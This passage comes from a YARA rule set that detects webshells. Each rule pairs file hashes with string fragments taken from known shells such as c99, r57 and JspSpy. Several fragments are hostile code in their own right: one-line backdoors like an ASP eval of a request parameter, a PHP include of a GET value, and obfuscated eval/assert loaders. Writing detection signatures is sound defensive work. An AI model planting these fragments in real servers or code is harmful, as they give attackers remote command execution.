   		super_rule = 1   
   		was = "_c99shell_v1_0_php_php_c99php_SsEs_php_php_ctt_sh_php_php"   
   		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"   
   		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"   
   		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"   
   		hash3 = "671cad517edd254352fe7e0c7c981c39"   
   	strings:   
   		$s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\""   
   		$s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\""   
   		$s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\""   
   	condition:   
   		2 of them   
rule FSO_s_EFSO_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file EFSO_2.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "a341270f9ebd01320a7490c12cb2e64c"   
   	strings:   
   		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"   
   		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"   
   	condition:   
   		all of them   
rule Mithril_dllTest {   
   	meta:   
   		description = "Webshells Auto-generated - file dllTest.dll"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "a8d25d794d8f08cd4de0c3d6bf389e6d"   
   	strings:   
   		$s0 = "please enter the password:"   
   		$s3 = "\\dllTest.pdb"   
   	condition:   
   		all of them   
rule bin_wuaus {   
   	meta:   
   		description = "Webshells Auto-generated - file wuaus.dll"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "46a365992bec7377b48a2263c49e4e7d"   
   	strings:   
   		$s1 = "9(90989@9V9^9f9n9v9"   
   		$s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:"   
   		$s3 = ";(=@=G=O=T=X=\\="   
   		$s4 = "TCP Send Error!!"   
   		$s5 = "1\"1;1X1^1e1m1w1~1"   
   		$s8 = "=$=)=/=<=Y=_=j=p=z="   
   	condition:   
   		all of them   
rule peek_a_boo {   
   	meta:   
   		description = "Webshells Auto-generated - file peek-a-boo.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "aca339f60d41fdcba83773be5d646776"   
   	strings:   
   		$s0 = "__vbaHresultCheckObj"   
   		$s1 = "\\VB\\VB5.OLB"   
   		$s2 = "capGetDriverDescriptionA"   
   		$s3 = "__vbaExceptHandler"   
   		$s4 = "EVENT_SINK_Release"   
   		$s8 = "__vbaErrorOverflow"   
   	condition:   
   		all of them   
rule multiple_webshells_0023 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_w_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php"   
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"   
   		hash1 = "9c5bb5e3a46ec28039e8986324e42792"   
   		hash2 = "d8ae5819a0a2349ec552cbcf3a62c975"   
   		hash3 = "9e9ae0332ada9c3797d6cee92c2ede62"   
   		hash4 = "09609851caa129e40b0d56e90dfc476c"   
   	strings:   
   		$s0 = "$sqlquicklaunch[] = array(\""   
   		$s1 = "else {echo \"<center><b>File does not exists (\".htmlspecialchars($d.$f).\")!<"   
   	condition:   
   		all of them   
rule multiple_webshells_0013 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_r577_php_php_SnIpEr_SA_Shell_php_r57_php_php"   
   		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"   
   		hash1 = "911195a9b7c010f61b66439d9048f400"   
   		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"   
   	strings:   
   		$s0 = "'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash'," fullword   
   		$s1 = "$name='ec371748dc2da624b35a4f8f685dd122'"   
   		$s2 = "rst.void.ru"   
   	condition:   
   		3 of them   
rule pws_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file pws.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "ecdc6c20f62f99fa265ec9257b7bf2ce"   
   	strings:   
   		$s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword   
   		$s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword   
   		$s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>"   
   	condition:   
   		2 of them   
rule WebShell__PH_Vayv_PHVayv_PH_Vayv_klasvayv_asp_php {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"   
   		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"   
   		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"   
   		hash3 = "4f83bc2836601225a115b5ad54496428a507a361"   
   	strings:   
   		$s1 = "<font color=\"#000000\">Sil</font></a></font></td>" fullword   
   		$s5 = "<td width=\"122\" height=\"17\" bgcolor=\"#9F9F9F\">" fullword   
   		$s6 = "onfocus=\"if (this.value == 'Kullan" fullword   
   		$s16 = "<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">"   
   	condition:   
   		2 of them   
rule multiple_webshells_0017 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_w_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php"   
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"   
   		hash1 = "9c5bb5e3a46ec28039e8986324e42792"   
   		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"   
   		hash3 = "09609851caa129e40b0d56e90dfc476c"   
   	strings:   
   		$s0 = "\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mvi"   
   		$s1 = "echo \"<b>Execute file:</b><form action=\\\"\".$surl.\"\\\" method=POST><inpu"   
   		$s2 = "\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswd"   
   	condition:   
   		1 of them   
rule pHpINJ_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file pHpINJ.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "d7a4b0df45d34888d5a09f745e85733f"   
   	strings:   
   		$s1 = "News Remote PHP Shell Injection"   
   		$s3 = "Php Shell <br />" fullword   
   		$s4 = "<input type = \"text\" name = \"url\" value = \""   
   	condition:   
   		2 of them   
rule webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz {   
   	meta:   
   		description = "Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"   
   		hash1 = "aa17b71bb93c6789911bd1c9df834ff9"   
   		hash2 = "b68bfafc6059fd26732fa07fb6f7f640"   
   		hash3 = "40a1f840111996ff7200d18968e42cfe"   
   		hash4 = "e0202adff532b28ef1ba206cf95962f2"   
   		hash5 = "802f5cae46d394b297482fd0c27cb2fc"   
   	strings:   
   		$s0 = "$this -> addFile($content, $filename);" fullword   
   		$s3 = "function addFile($data, $name, $time = 0) {" fullword   
   		$s8 = "function unix2DosTime($unixtime = 0) {" fullword   
   		$s9 = "foreach($filelist as $filename){" fullword   
   	condition:   
   		all of them   
rule DefaceKeeper_0_2_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file DefaceKeeper_0.2.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "713c54c3da3031bc614a8a55dccd7e7f"   
   	strings:   
   		$s0 = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword   
   		$s1 = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9"   
   		$s2 = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center"   
   	condition:   
   		1 of them   
rule Webshell_r57shell_2 {   
   	meta:   
   		description = "Detects Webshell R57"   
   		author = "Florian Roth"   
   		reference = "https://github.com/nikicat/web-malware-collection"   
   		date = "2016-01-11"   
   		score = 70   
   		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"   
   		hash2 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"   
   		hash3 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"   
   		hash4 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"   
   		hash5 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"   
   		hash6 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"   
   		hash7 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"   
   		hash8 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"   
   		hash9 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"   
   		hash10 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"   
   		hash11 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"   
   		hash12 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"   
   		hash13 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"   
   	strings:   
   		$s1 = "$connection = @ftp_connect($ftp_server,$ftp_port,10);" fullword ascii   
   		$s2 = "echo $lang[$language.'_text98'].$suc.\"\\r\\n\";" fullword ascii   
   	condition:   
   		filesize < 900KB and all of them   
rule PHP_Cloaked_Webshell_SuperFetchExec {   
   	meta:   
   		description = "Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC"   
   		reference = "http://goo.gl/xFvioC"   
   		author = "Florian Roth"   
   		score = 50   
   	strings:   
   		$s0 = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);"   
   	condition:   
   		$s0   
rule webshell_phpkit_1_0_odd {   
   	meta:   
   		description = "Web Shell - file odd.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "594d1b1311bbef38a0eb3d6cbb1ab538"   
   	strings:   
   		$s0 = "include('php://input');" fullword   
   		$s1 = "// No eval() calls, no system() calls, nothing normally seen as malicious." fullword   
   		$s2 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword   
   	condition:   
   		all of them   
rule xssshell_save {   
   	meta:   
   		description = "Webshells Auto-generated - file save.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "865da1b3974e940936fe38e8e1964980"   
   	strings:   
   		$s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID"   
   		$s5 = "VictimID = fm_NStr(Victims(i))"   
   	condition:   
   		all of them   
rule settings : webshell {   
   	meta:   
   		description = "Laudanum Injector Tools - file settings.php"   
   		author = "Florian Roth"   
   		reference = "http://laudanum.inguardians.com/"   
   		date = "2015-06-22"   
   		hash = "588739b9e4ef2dbb0b4cf630b73295d8134cc801"   
   	strings:   
   		$s1 = "Port: <input name=\"port\" type=\"text\" value=\"8888\">" fullword ascii /* PEStudio Blacklist: strings */   
   		$s2 = "<li>Reverse Shell - " fullword ascii /* PEStudio Blacklist: strings */   
   		$s3 = "<li><a href=\"<?php echo plugins_url('file.php', __FILE__);?>\">File Browser</a>" ascii /* PEStudio Blacklist: strings */   
   	condition:   
   		filesize < 13KB and all of them   
rule WinX_Shell_html {   
   	meta:   
   		description = "Semi-Auto-generated  - file WinX Shell.html.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "17ab5086aef89d4951fe9b7c7a561dda"   
   	strings:   
   		$s0 = "WinX Shell"   
   		$s1 = "Created by greenwood from n57"   
   		$s2 = "<td><font color=\\\"#990000\\\">Win Dir:</font></td>"   
   	condition:   
   		2 of them   
rule WebShell_php_webshells_aspydrv {   
   	meta:   
   		description = "PHP Webshells Github Archive - file aspydrv.php"   
   		author = "Florian Roth"   
   		hash = "3d8996b625025dc549d73cdb3e5fa678ab35d32a"   
   	strings:   
   		$s0 = "Target = \"D:\\hshome\\masterhr\\masterhr.com\\\"  ' ---Directory to which files"   
   		$s1 = "nPos = InstrB(nPosEnd, biData, CByteString(\"Content-Type:\"))" fullword   
   		$s3 = "Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1" fullword   
   		$s17 = "If request.querystring(\"getDRVs\")=\"@\" then" fullword   
   		$s20 = "' ---Copy Too Folder routine Start" fullword   
   	condition:   
   		3 of them   
rule RkNTLoad {   
   	meta:   
   		description = "Webshells Auto-generated - file RkNTLoad.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "262317c95ced56224f136ba532b8b34f"   
   	strings:   
   		$s1 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"   
   		$s2 = "5pur+virtu!"   
   		$s3 = "ugh spac#n"   
   		$s4 = "xcEx3WriL4"   
   		$s5 = "runtime error"   
   		$s6 = "loseHWait.Sr."   
   		$s7 = "essageBoxAw"   
   		$s8 = "$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $"   
   	condition:   
   		all of them   
rule webshell_jsp_up {   
   	meta:   
   		description = "Web Shell - file up.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "515a5dd86fe48f673b72422cccf5a585"   
   	strings:   
   		$s9 = "// BUG: Corta el fichero si es mayor de 640Ks" fullword   
   	condition:   
   		all of them   
rule FSO_s_reader {   
   	meta:   
   		description = "Webshells Auto-generated - file reader.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "b598c8b662f2a1f6cc61f291fb0a6fa2"   
   	strings:   
   		$s2 = "mailto:mailbomb@hotmail."   
   	condition:   
   		all of them   
rule WebShell_cgi {   
   	meta:   
   		description = "Semi-Auto-generated  - file WebShell.cgi.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "bc486c2e00b5fc3e4e783557a2441e6f"   
   	strings:   
   		$s0 = "WebShell.cgi"   
   		$s2 = "<td><code class=\"entry-[% if entry.all_rights %]mine[% else"   
   	condition:   
   		all of them   
rule multiple_webshells_0003 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_network_php_php_xinfo_php_php_nfm_php_php"   
   		hash0 = "acdbba993a5a4186fd864c5e4ea0ba4f"   
   		hash1 = "2601b6fc1579f263d2f3960ce775df70"   
   		hash2 = "401fbae5f10283051c39e640b77e4c26"   
   	strings:   
   		$s0 = ".textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa"   
   		$s2 = "<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''"   
   	condition:   
   		all of them   
rule webshell_webshell_cnseay_x {   
   	meta:   
   		description = "Web Shell - file webshell-cnseay-x.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "a0f9f7f5cd405a514a7f3be329f380e5"   
   	strings:   
   		$s9 = "$_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_"   
   	condition:   
   		all of them   
rule webshell_ironshell {   
   	meta:   
   		description = "Web Shell - file ironshell.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "8bfa2eeb8a3ff6afc619258e39fded56"   
   	strings:   
   		$s4 = "print \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\""   
   		$s8 = "print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di"   
   	condition:   
   		all of them   
rule webshell_000_403_807_a_c5_config_css_dm_he1p_xxx {   
   	meta:   
   		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"   
   		hash1 = "059058a27a7b0059e2c2f007ad4675ef"   
   		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"   
   		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"   
   		hash4 = "8b457934da3821ba58b06a113e0d53d9"   
   		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"   
   		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"   
   		hash7 = "14e9688c86b454ed48171a9d4f48ace8"   
   		hash8 = "b330a6c2d49124ef0729539761d6ef0b"   
   		hash9 = "d71716df5042880ef84427acee8b121e"   
   		hash10 = "341298482cf90febebb8616426080d1d"   
   		hash11 = "29aebe333d6332f0ebc2258def94d57e"   
   		hash12 = "42654af68e5d4ea217e6ece5389eb302"   
   		hash13 = "88fc87e7c58249a398efd5ceae636073"   
   		hash14 = "4a812678308475c64132a9b56254edbc"   
   		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"   
   		hash16 = "e0354099bee243702eb11df8d0e046df"   
   		hash17 = "344f9073576a066142b2023629539ebd"   
   		hash18 = "32dea47d9c13f9000c4c807561341bee"   
   		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"   
   		hash20 = "655722eaa6c646437c8ae93daac46ae0"   
   		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"   
   		hash22 = "6acc82544be056580c3a1caaa4999956"   
   		hash23 = "6aa32a6392840e161a018f3907a86968"   
   		hash24 = "591ca89a25f06cf01e4345f98a22845c"   
   		hash25 = "349ec229e3f8eda0f9eb918c74a8bf4c"   
   		hash26 = "3ea688e3439a1f56b16694667938316d"   
   		hash27 = "ab77e4d1006259d7cbc15884416ca88c"   
   		hash28 = "71097537a91fac6b01f46f66ee2d7749"   
   		hash29 = "2434a7a07cb47ce25b41d30bc291cacc"   
   		hash30 = "7a4b090619ecce6f7bd838fe5c58554b"   
   	strings:   
   		$s3 = "String savePath = request.getParameter(\"savepath\");" fullword   
   		$s4 = "URL downUrl = new URL(downFileUrl);" fullword   
   		$s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword   
   		$s6 = "String downFileUrl = request.getParameter(\"url\");" fullword   
   		$s7 = "FileInputStream fInput = new FileInputStream(f);" fullword   
   		$s8 = "URLConnection conn = downUrl.openConnection();" fullword   
   		$s9 = "sis = request.getInputStream();" fullword   
   	condition:   
   		4 of them   
rule WebShell_Generic_PHP_3 {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files Antichat Shell v1.3.php, Antichat Shell. Modified by Go0o$E.php, Antichat Shell.php, fatal.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "d829e87b3ce34460088c7775a60bded64e530cd4"   
   		hash1 = "d710c95d9f18ec7c76d9349a28dd59c3605c02be"   
   		hash2 = "f044d44e559af22a1a7f9db72de1206f392b8976"   
   		hash3 = "41780a3e8c0dc3cbcaa7b4d3c066ae09fb74a289"   
   	strings:   
   		$s0 = "header('Content-Length:'.filesize($file).'');" fullword   
   		$s4 = "<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_POST['comma"   
   		$s7 = "if(filetype($dir . $file)==\"file\")$files[]=$file;" fullword   
   		$s14 = "elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} " fullword   
   		$s20 = "$info .= (($perms & 0x0004) ? 'r' : '-');" fullword   
   	condition:   
   		all of them   
rule Webshell_c99_4 {   
   	meta:   
   		description = "Detects C99 Webshell"   
   		author = "Florian Roth"   
   		reference = "https://github.com/nikicat/web-malware-collection"   
   		date = "2016-01-11"   
   		score = 70   
   		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"   
   		hash2 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"   
   		hash3 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"   
   		hash4 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"   
   		hash5 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"   
   		hash6 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"   
   		hash7 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"   
   		hash8 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"   
   		hash9 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"   
   		hash10 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"   
   		hash11 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"   
   		hash12 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"   
   		hash13 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"   
   		hash14 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"   
   	strings:   
   		$s1 = "displaysecinfo(\"List of Attributes\",myshellexec(\"lsattr -a\"));" fullword ascii   
   		$s2 = "displaysecinfo(\"RAM\",myshellexec(\"free -m\"));" fullword ascii   
   		$s3 = "displaysecinfo(\"Where is perl?\",myshellexec(\"whereis perl\"));" fullword ascii   
   		$s4 = "$ret = myshellexec($handler);" fullword ascii   
   		$s5 = "if (posix_kill($pid,$sig)) {echo \"OK.\";}" fullword ascii   
   	condition:   
   		filesize < 900KB and 1 of them   
rule webshell_php_moon {   
   	meta:   
   		description = "Web Shell - file moon.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "2a2b1b783d3a2fa9a50b1496afa6e356"   
   	strings:   
   		$s2 = "echo '<option value=\"create function backshell returns string soname"   
   		$s3 = "echo      \"<input name='p' type='text' size='27' value='\".dirname(_FILE_).\""   
   		$s8 = "echo '<option value=\"select cmdshell(\\'net user "   
   	condition:   
   		2 of them   
rule webshell_caidao_shell_404 {   
   	meta:   
   		description = "Web Shell - file 404.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "ee94952dc53d9a29bdf4ece54c7a7aa7"   
   	strings:   
   		$s0 = "<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St"   
   	condition:   
   		all of them   
rule FeliksPack3___PHP_Shells_2005 {   
   	meta:   
   		description = "Webshells Auto-generated - file 2005.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "97f2552c2fafc0b2eb467ee29cc803c8"   
   	strings:   
   		$s0 = "window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp"   
   		$s3 = "<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">"   
   	condition:   
   		all of them   
rule multiple_webshells_0021 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_GFS_web_shell_ver_3_1_7___PRiV8_php_nshell_php_php_gfs_sh_php_php"   
   		hash0 = "be0f67f3e995517d18859ed57b4b4389"   
   		hash1 = "4a44d82da21438e32d4f514ab35c26b6"   
   		hash2 = "f618f41f7ebeb5e5076986a66593afd1"   
   	strings:   
   		$s2 = "echo $uname.\"</font><br><b>\";" fullword   
   		$s3 = "while(!feof($f)) { $res.=fread($f,1024); }" fullword   
   		$s4 = "echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()"   
   	condition:   
   		2 of them   
rule webshell_PHP_bug_1_ {   
   	meta:   
   		description = "Web Shell - file bug (1).php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "91c5fae02ab16d51fc5af9354ac2f015"   
   	strings:   
   		$s0 = "@include($_GET['bug']);" fullword   
   	condition:   
   		all of them   
rule multiple_webshells_0027 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_nst_php_php_cybershell_php_php_img_php_php_nstview_php_php"   
   		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"   
   		hash1 = "ef8828e0bc0641a655de3932199c0527"   
   		hash2 = "17a07bb84e137b8aa60f87cd6bfab748"   
   		hash3 = "4745d510fed4378e4b1730f56f25e569"   
   	strings:   
   		$s0 = "@$rto=$_POST['rto'];" fullword   
   		$s2 = "SCROLLBAR-TRACK-COLOR: #91AAFF" fullword   
   		$s3 = "$to1=str_replace(\"//\",\"/\",$to1);" fullword   
   	condition:   
   		2 of them   
rule svchostdll {   
   	meta:   
   		description = "Webshells Auto-generated - file svchostdll.dll"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "0f6756c8cb0b454c452055f189e4c3f4"   
   	strings:   
   		$s0 = "InstallService"   
   		$s1 = "RundllInstallA"   
   		$s2 = "UninstallService"   
   		$s3 = "&G3 Users In RegistryD"   
   		$s4 = "OL_SHUTDOWN;I"   
   		$s5 = "SvcHostDLL.dll"   
   		$s6 = "RundllUninstallA"   
   		$s7 = "InternetOpenA"   
   		$s8 = "Check Cloneomplete"   
   	condition:   
   		all of them   
rule webshell_asp_1 {   
   	meta:   
   		description = "Web Shell - file 1.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "8991148adf5de3b8322ec5d78cb01bdb"   
   	strings:   
   		$s4 = "!22222222222222222222222222222222222222222222222222" fullword   
   		$s8 = "<%eval request(\"pass\")%>" fullword   
   	condition:   
   		all of them   
rule webshell_000_403_c5_queryDong_spyjsp2010 {   
   	meta:   
   		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"   
   		hash1 = "059058a27a7b0059e2c2f007ad4675ef"   
   		hash2 = "8b457934da3821ba58b06a113e0d53d9"   
   		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"   
   		hash4 = "655722eaa6c646437c8ae93daac46ae0"   
   	strings:   
   		$s2 = "\" <select name='encode' class='input'><option value=''>ANSI</option><option val"   
   		$s7 = "JSession.setAttribute(\"MSG\",\"<span style='color:red'>Upload File Failed!</spa"   
   		$s8 = "File f = new File(JSession.getAttribute(CURRENT_DIR)+\"/\"+fileBean.getFileName("   
   		$s9 = "((Invoker)ins.get(\"vd\")).invoke(request,response,JSession);" fullword   
   	condition:   
   		2 of them   
rule webshell_2_520_icesword_job_ma1 {   
   	meta:   
   		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "64a3bf9142b045b9062b204db39d4d57"   
   		hash1 = "9abd397c6498c41967b4dd327cf8b55a"   
   		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"   
   		hash3 = "56c005690da2558690c4aa305a31ad37"   
   		hash4 = "532b93e02cddfbb548ce5938fe2f5559"   
   	strings:   
